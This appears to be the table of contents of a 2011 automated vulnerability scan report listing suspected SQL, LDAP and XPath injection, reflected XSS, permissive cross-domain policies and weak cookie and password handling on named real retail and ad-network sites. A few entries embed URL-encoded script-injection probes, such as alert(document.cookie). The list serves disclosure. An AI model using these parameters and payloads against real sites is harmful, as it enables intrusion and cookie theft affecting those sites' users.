XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 06:15:01 CDT 2011.




1. SQL injection

1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter]

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2]

1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2]

1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter]

2.2. http://cimg-1.restorationhardware.com/cm [ci parameter]

2.3. http://server.bhphotovideo.com/cm [ci parameter]

3. XPath injection

3.1. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter]

3.2. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter]

3.3. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter]

3.4. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter]

3.5. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter]

3.6. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter]

3.7. http://community.petco.com/n/blogs/blog.aspx [config parameter]

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter]

4. HTTP header injection

4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter]

4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter]

5. Cross-site scripting (reflected)

5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

5.7. http://html.aggregateknowledge.com/iframe [wid parameter]

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]

5.18. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]

5.19. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.38. http://px.steelhousemedia.com/pr [get_px parameter]

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]

5.40. http://px.steelhousemedia.com/pr [prov_id parameter]

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter]

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.46. http://sv.liveclicker.net/service/api [var parameter]

5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter]

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter]

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]

5.67. http://www.petsmart.com/ [rdir parameter]

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header]

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header]

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie]

5.76. http://www.petco.com/ [ResonanceSegment cookie]

6. Flash cross-domain policy

6.1. http://9d060c.r.axf8.net/crossdomain.xml

6.2. http://a.netmng.com/crossdomain.xml

6.3. http://a.rfihub.com/crossdomain.xml

6.4. http://a.tribalfusion.com/crossdomain.xml

6.5. http://action.mathtag.com/crossdomain.xml

6.6. http://action.media6degrees.com/crossdomain.xml

6.7. http://ad.afy11.net/crossdomain.xml

6.8. http://ad.doubleclick.net/crossdomain.xml

6.9. http://ads.traderonline.com/crossdomain.xml

6.10. http://ads.undertone.com/crossdomain.xml

6.11. http://adserver.veruta.com/crossdomain.xml

6.12. http://altfarm.mediaplex.com/crossdomain.xml

6.13. http://b.scorecardresearch.com/crossdomain.xml

6.14. http://beacon.afy11.net/crossdomain.xml

6.15. http://bp.specificclick.net/crossdomain.xml

6.16. http://bs.serving-sys.com/crossdomain.xml

6.17. http://cebwa.122.2o7.net/crossdomain.xml

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml

6.19. http://customerappreciation.petco.com/crossdomain.xml

6.20. http://d.xp1.ru4.com/crossdomain.xml

6.21. http://data.coremetrics.com/crossdomain.xml

6.22. http://dis.us.criteo.com/crossdomain.xml

6.23. http://fls.doubleclick.net/crossdomain.xml

6.24. http://gsicace.112.2o7.net/crossdomain.xml

6.25. http://hire.jobvite.com/crossdomain.xml

6.26. http://ib.adnxs.com/crossdomain.xml

6.27. http://idcs.interclick.com/crossdomain.xml

6.28. http://marketlive.122.2o7.net/crossdomain.xml

6.29. http://mbox12.offermatica.com/crossdomain.xml

6.30. http://media.fastclick.net/crossdomain.xml

6.31. http://media.gnc.com/crossdomain.xml

6.32. http://media.gsimedia.net/crossdomain.xml

6.33. http://media2.legacy.com/crossdomain.xml

6.34. http://metrics.brookstone.com/crossdomain.xml

6.35. http://metrics.ftd.com/crossdomain.xml

6.36. http://metrics.gnc.com/crossdomain.xml

6.37. http://metrics.mcafee.com/crossdomain.xml

6.38. http://metrics.pacsun.com/crossdomain.xml

6.39. http://metrics.petsmart.com/crossdomain.xml

6.40. http://mlarmani.122.2o7.net/crossdomain.xml

6.41. http://o.toshibadirect.com/crossdomain.xml

6.42. http://pix04.revsci.net/crossdomain.xml

6.43. http://r.turn.com/crossdomain.xml

6.44. http://rpt.footlocker.com/crossdomain.xml

6.45. http://s.xp1.ru4.com/crossdomain.xml

6.46. http://secure-us.imrworldwide.com/crossdomain.xml

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml

6.48. http://server.bhphotovideo.com/crossdomain.xml

6.49. http://sv.liveclicker.net/crossdomain.xml

6.50. http://tags.mediaforge.com/crossdomain.xml

6.51. http://uat.netmng.com/crossdomain.xml

6.52. http://wasc.homedepot.ca/crossdomain.xml

6.53. http://www.mapquestapi.com/crossdomain.xml

6.54. http://www26.orientaltrading.com/crossdomain.xml

6.55. http://ace.imageg.net/crossdomain.xml

6.56. http://ads.adbrite.com/crossdomain.xml

6.57. http://ads.al.com/crossdomain.xml

6.58. http://feeds.bbci.co.uk/crossdomain.xml

6.59. http://gnc.imageg.net/crossdomain.xml

6.60. http://googleads.g.doubleclick.net/crossdomain.xml

6.61. http://images.scanalert.com/crossdomain.xml

6.62. http://images3.pacsun.com/crossdomain.xml

6.63. http://login.dotomi.com/crossdomain.xml

6.64. http://media.restorationhardware.com/crossdomain.xml

6.65. http://newsrss.bbc.co.uk/crossdomain.xml

6.66. https://ordering.ftd.com/crossdomain.xml

6.67. http://pet.imageg.net/crossdomain.xml

6.68. http://rya.rockyou.com/crossdomain.xml

6.69. http://s7.orientaltrading.com/crossdomain.xml

6.70. https://secure.homedepot.ca/crossdomain.xml

6.71. http://static.ak.fbcdn.net/crossdomain.xml

6.72. http://subscriptions.marvel.com/crossdomain.xml

6.73. https://subscriptions.marvel.com/crossdomain.xml

6.74. http://www.acehardware.com/crossdomain.xml

6.75. https://www.acehardware.com/crossdomain.xml

6.76. http://www.armaniexchange.com/crossdomain.xml

6.77. https://www.armaniexchange.com/crossdomain.xml

6.78. http://www.facebook.com/crossdomain.xml

6.79. http://www.ftd.com/crossdomain.xml

6.80. http://www.gnc.com/crossdomain.xml

6.81. https://www.gnc.com/crossdomain.xml

6.82. http://www.homedepot.ca/crossdomain.xml

6.83. http://www.petsmart.com/crossdomain.xml

6.84. https://www.petsmart.com/crossdomain.xml

6.85. http://www.res-x.com/crossdomain.xml

6.86. http://www.helzberg.com/crossdomain.xml

6.87. https://www.helzberg.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml

7.7. http://metrics.ftd.com/clientaccesspolicy.xml

7.8. http://metrics.gnc.com/clientaccesspolicy.xml

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://shoprunner.force.com/content/JsContentElementsGNC

8.2. http://shoprunner.force.com/content/JsContentElementsPET

8.3. http://www.ftd.com/

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

8.5. http://www.petco.com/Secure/Login.aspx

9. SSL cookie without secure flag set

9.1. https://secure.bhphotovideo.com/bnh/controller/home

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

9.4. https://www.acehardware.com/checkout/index.jsp

9.5. https://www.footlocker.com/account/default.cfm

9.6. https://www.footlocker.com/account/default/

9.7. https://www.petsmart.com/coreg/index.jsp

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

9.9. https://ordering.ftd.com/reminder-signin/

9.10. https://ordering.ftd.com/signin/

9.11. https://ordering.ftd.com/signin/

9.12. https://secure.bluenile.com/accounts/account-sign-in.html

9.13. https://www.brookstone.com/favicon.ico

9.14. https://www.brookstone.com/formhandlerservlet

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp

9.16. https://www.restorationhardware.com/my-account/register.jsp

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

10. Session token in URL

10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

10.2. http://t.p.mybuys.com/webrec/wr.do

10.3. http://www.acehardware.com/storeLocServ

10.4. http://www.bluefly.com/

10.5. http://www.bluefly.com/myfly/login.jsp

10.6. http://www.facebook.com/extern/login_status.php

10.7. https://www.toshibadirect.com/images/ui5/btn_login.gif

11. Password field submitted using GET method

11.1. https://ordering.ftd.com/new-signup/

11.2. https://ordering.ftd.com/new-signup/

11.3. https://ordering.ftd.com/reminder-signin/

11.4. https://ordering.ftd.com/reminder-signin/

11.5. https://ordering.ftd.com/signin/

11.6. https://ordering.ftd.com/signin/

11.7. http://shoprunner.force.com/content/JsContentElementsGNC

11.8. http://shoprunner.force.com/content/JsContentElementsPET

11.9. http://www.ftd.com/

11.10. http://www.ftd.com/

11.11. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

11.12. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

12. Cookie scoped to parent domain

12.1. http://eval.bizrate.com/js/survey_126457_1.js

12.2. http://login.dotomi.com/ucm/UCMController

12.3. https://secure.bhphotovideo.com/bnh/controller/home

12.4. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

12.5. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

12.6. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

12.7. http://a.netmng.com/

12.8. http://a.rfihub.com/ca.gif

12.9. http://a.tribalfusion.com/i.cid

12.10. http://action.media6degrees.com/orbserv/hbjs

12.11. http://action.media6degrees.com/orbserv/hbpix

12.12. http://ad.trafficmp.com/a/bpix

12.13. http://ads.adbrite.com/adserver/vdi/684339

12.14. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://ads.revsci.net/adserver/ako

12.20. http://ads.revsci.net/adserver/ako

12.21. http://ads.revsci.net/adserver/ako

12.22. http://ads.revsci.net/adserver/ako

12.23. http://adserver.veruta.com/track.fcgi

12.24. http://b.scorecardresearch.com/p

12.25. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

12.26. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

12.27. http://cdn.www.bluefly.com/media/css/mybluefly.css

12.28. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

12.29. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

12.30. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

12.31. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

12.32. http://dis.us.criteo.com/dis/dis.aspx

12.33. http://html.aggregateknowledge.com/iframe

12.34. http://ib.adnxs.com/pxj

12.35. http://ib.adnxs.com/seg

12.36. http://idcs.interclick.com/Segment.aspx

12.37. http://image2.pubmatic.com/AdServer/Pug

12.38. http://leadback.advertising.com/adcedge/lb

12.39. http://media.fastclick.net/w/tre

12.40. http://media.gnc.com/ipixel

12.41. http://media.gsimedia.net/ipixel

12.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

12.43. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

12.44. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

12.45. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

12.46. https://ordering.ftd.com/reminder-signin/

12.47. https://ordering.ftd.com/signin/

12.48. https://ordering.ftd.com/signin/

12.49. http://phoenix.untd.com/TRCK/RGST

12.50. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

12.51. http://pixel.fetchback.com/serve/fb/pdc

12.52. http://pixel.fetchback.com/serve/fb/ver

12.53. http://pixel.mathtag.com/data/img

12.54. http://pixel.mathtag.com/event/img

12.55. http://pixel.rubiconproject.com/tap.php

12.56. http://pixel.traveladvertising.com/Live/Pixel.aspx

12.57. http://px.steelhousemedia.com/pr

12.58. http://px.steelhousemedia.com/st

12.59. http://r.turn.com/r/beacon

12.60. http://rya.rockyou.com/ams/ptrck.php

12.61. http://s.xp1.ru4.com/meta

12.62. http://sales.liveperson.net/hc/1402662/

12.63. http://sales.liveperson.net/hc/46281118/

12.64. http://sales.liveperson.net/hc/53965383/

12.65. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

12.66. https://secure.bluenile.com/accounts/account-sign-in.html

12.67. http://segment-pixel.invitemedia.com/pixel

12.68. http://srv.clickfuse.com/pixels/create.php

12.69. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

12.70. http://sync.mathtag.com/sync/img

12.71. http://t.p.mybuys.com/webrec/wr.do

12.72. http://tags.mediaforge.com/if/50

12.73. http://tracking.searchmarketing.com/welcome.asp

12.74. http://uat.netmng.com/pixel/

12.75. http://www.bluefly.com/

12.76. http://www.bluefly.com/myfly/forgot_password.jsp

12.77. http://www.bluefly.com/myfly/login.jsp

12.78. http://www.bluenile.com/

12.79. http://www.bluenile.com/build-your-own-diamond-ring

12.80. http://www.bluenile.com/channel-recommendations.html

12.81. http://www.bluenile.com/fbc/setStatus.html

12.82. http://www.footlocker.com/

12.83. http://www.footlocker.com/login/login.cfm

12.84. http://www.footlocker.com/login/login_forgotpassword.cfm

12.85. http://www.footlocker.com/login/login_form.cfm

12.86. https://www.footlocker.com/account/default.cfm

12.87. https://www.footlocker.com/account/default/

12.88. http://www.imiclk.com/cgi/r.cgi

12.89. http://www.linkedin.com/companyInsider

12.90. http://www.petco.com/

12.91. http://www22.glam.com/cTagsImgCmd.act

13. Cookie without HttpOnly flag set

13.1. http://action.media6degrees.com/orbserv/hbjs

13.2. http://core.bluefly.com/cm

13.3. http://eval.bizrate.com/js/survey_126457_1.js

13.4. http://login.dotomi.com/ucm/UCMController

13.5. http://sales.liveperson.net/visitor/addons/deploy.asp

13.6. http://sales.liveperson.net/visitor/addons/deploy.asp

13.7. http://sales.liveperson.net/visitor/addons/deploy.asp

13.8. https://secure.bhphotovideo.com/bnh/controller/home

13.9. https://secure.bluenile.com/926308692/bundles/core.js

13.10. https://secure.bluenile.com/984568475/css/footer.css

13.11. https://secure.bluenile.com/N1374326862/bundles/cart.css

13.12. https://secure.bluenile.com/N1991330425/js/navigation_flyouts_menu.js

13.13. https://secure.bluenile.com/N3371804/bundles/allpages.js

13.14. https://secure.bluenile.com/N3821919/bundles/footer.js

13.15. https://secure.bluenile.com/N518116487/bundles/allpages.css

13.16. https://secure.bluenile.com/N522719515/bundles/ga.js

13.17. https://secure.bluenile.com/N688855944/css/cart_print.css

13.18. https://secure.bluenile.com/accounts/account-sign-in.html

13.19. https://secure.bluenile.com/favicon.ico

13.20. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

13.21. http://t.p.mybuys.com/webrec/wr.do

13.22. http://tracking.searchmarketing.com/welcome.asp

13.23. http://tracking.searchmarketing.com/welcome.asp

13.24. http://tracking.searchmarketing.com/welcome.asp

13.25. http://tracking.searchmarketing.com/welcome.asp

13.26. http://tracking.searchmarketing.com/welcome.asp

13.27. http://tracking.searchmarketing.com/welcome.asp

13.28. http://tracking.searchmarketing.com/welcome.asp

13.29. http://tracking.searchmarketing.com/welcome.asp

13.30. http://tracking.searchmarketing.com/welcome.asp

13.31. http://tracking.searchmarketing.com/welcome.asp

13.32. http://tracking.searchmarketing.com/welcome.asp

13.33. https://www.acehardware.com/checkout/index.jsp

13.34. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

13.35. http://www.bluefly.com/

13.36. http://www.brookstone.com/

13.37. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

13.38. http://www.footlocker.com/

13.39. http://www.footlocker.com/login/login.cfm

13.40. http://www.footlocker.com/login/login_forgotpassword.cfm

13.41. http://www.footlocker.com/login/login_form.cfm

13.42. https://www.footlocker.com/account/default.cfm

13.43. https://www.footlocker.com/account/default/

13.44. http://www.gnc.com/community/index.jsp%20%20

13.45. http://www.helzberg.com/account.do

13.46. http://www.linkedin.com/companyInsider

13.47. https://www.petsmart.com/coreg/index.jsp

13.48. http://www.restorationhardware.com/my-account/sign-in.jsp

13.49. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

13.50. http://a.netmng.com/

13.51. http://a.rfihub.com/ca.gif

13.52. http://a.tribalfusion.com/i.cid

13.53. http://action.media6degrees.com/orbserv/hbpix

13.54. http://ad.trafficmp.com/a/bpix

13.55. http://ad.yieldmanager.com/pixel

13.56. http://ads.adbrite.com/adserver/vdi/684339

13.57. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

13.58. http://ads.revsci.net/adserver/ako

13.59. http://ads.revsci.net/adserver/ako

13.60. http://ads.revsci.net/adserver/ako

13.61. http://ads.revsci.net/adserver/ako

13.62. http://ads.revsci.net/adserver/ako

13.63. http://ads.revsci.net/adserver/ako

13.64. http://ads.revsci.net/adserver/ako

13.65. http://ads.revsci.net/adserver/ako

13.66. http://ads.undertone.com/f

13.67. http://adserver.veruta.com/track.fcgi

13.68. http://b.scorecardresearch.com/p

13.69. http://bluefly.com/

13.70. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

13.71. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

13.72. http://cdn.www.bluefly.com/media/css/mybluefly.css

13.73. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

13.74. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

13.75. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

13.76. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

13.77. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258

13.78. http://cimg-1.restorationhardware.com/cm

13.79. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1

13.80. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1

13.81. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1

13.82. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1

13.83. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1

13.84. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1

13.85. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

13.86. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll

13.87. http://community.petco.com/n/blogs/blog.aspx

13.88. http://community.petco.com/n/pfx/forum.aspx

13.89. http://core.bluefly.com/cm

13.90. http://customerappreciation.petco.com/cm

13.91. http://dis.us.criteo.com/dis/dis.aspx

13.92. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925

13.93. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.94. http://html.aggregateknowledge.com/iframe

13.95. http://idcs.interclick.com/Segment.aspx

13.96. http://image2.pubmatic.com/AdServer/Pug

13.97. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

13.98. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

13.99. http://leadback.advertising.com/adcedge/lb

13.100. http://login.dotomi.com/ucm/UCMController

13.101. http://media.fastclick.net/w/tre

13.102. http://media.gnc.com/ipixel

13.103. http://media.gsimedia.net/ipixel

13.104. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

13.105. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

13.106. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

13.107. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

13.108. https://ordering.ftd.com/reminder-signin/

13.109. https://ordering.ftd.com/signin/

13.110. https://ordering.ftd.com/signin/

13.111. http://phoenix.untd.com/TRCK/RGST

13.112. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

13.113. http://pixel.fetchback.com/serve/fb/pdc

13.114. http://pixel.fetchback.com/serve/fb/ver

13.115. http://pixel.mathtag.com/data/img

13.116. http://pixel.mathtag.com/event/img

13.117. http://pixel.rubiconproject.com/tap.php

13.118. http://pixel.traveladvertising.com/Live/Pixel.aspx

13.119. http://px.steelhousemedia.com/pr

13.120. http://px.steelhousemedia.com/st

13.121. http://r.turn.com/r/beacon

13.122. http://rpt.footlocker.com/eluminate

13.123. http://rya.rockyou.com/ams/ptrck.php

13.124. http://s.xp1.ru4.com/meta

13.125. http://sales.liveperson.net/hc/1402662/

13.126. http://sales.liveperson.net/hc/1402662/

13.127. http://sales.liveperson.net/hc/1402662/

13.128. http://sales.liveperson.net/hc/46281118/

13.129. http://sales.liveperson.net/hc/46281118/

13.130. http://sales.liveperson.net/hc/53965383/

13.131. http://sales.liveperson.net/hc/53965383/

13.132. http://sales.liveperson.net/hc/53965383/

13.133. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

13.134. http://segment-pixel.invitemedia.com/pixel

13.135. http://server.bhphotovideo.com/cm

13.136. http://srv.clickfuse.com/pixels/create.php

13.137. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

13.138. http://subscriptions.marvel.com/checkout/

13.139. http://sync.mathtag.com/sync/img

13.140. http://tags.mediaforge.com/if/50

13.141. http://trvlgrd.netmng.com/

13.142. http://uat.netmng.com/pixel/

13.143. http://web.aisle7.net/jsapi/1.0/content.js

13.144. http://www.acehardware.com/category/index.jsp

13.145. http://www.bhphotovideo.com/bnh/controller/home

13.146. http://www.bluefly.com/__ssobj/ard.png

13.147. http://www.bluefly.com/__ssobj/core.js

13.148. http://www.bluefly.com/favicon.ico

13.149. http://www.bluefly.com/myfly/forgot_password.jsp

13.150. http://www.bluefly.com/myfly/login.jsp

13.151. http://www.bluenile.com/

13.152. http://www.bluenile.com/build-your-own-diamond-ring

13.153. http://www.bluenile.com/channel-recommendations.html

13.154. http://www.bluenile.com/fbc/setStatus.html

13.155. http://www.brookstone.com/favicon.ico

13.156. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

13.157. http://www.brookstone.com/formhandlerservlet

13.158. http://www.brookstone.com/outdoor-living.html

13.159. http://www.brookstone.com/shoppingCart.jsp.vr

13.160. https://www.brookstone.com/favicon.ico

13.161. https://www.brookstone.com/formhandlerservlet

13.162. http://www.gnc.com/home/index.jsp

13.163. http://www.gnc.com/recommendationpixel/user.jsp

13.164. http://www.guitarcenter.com/

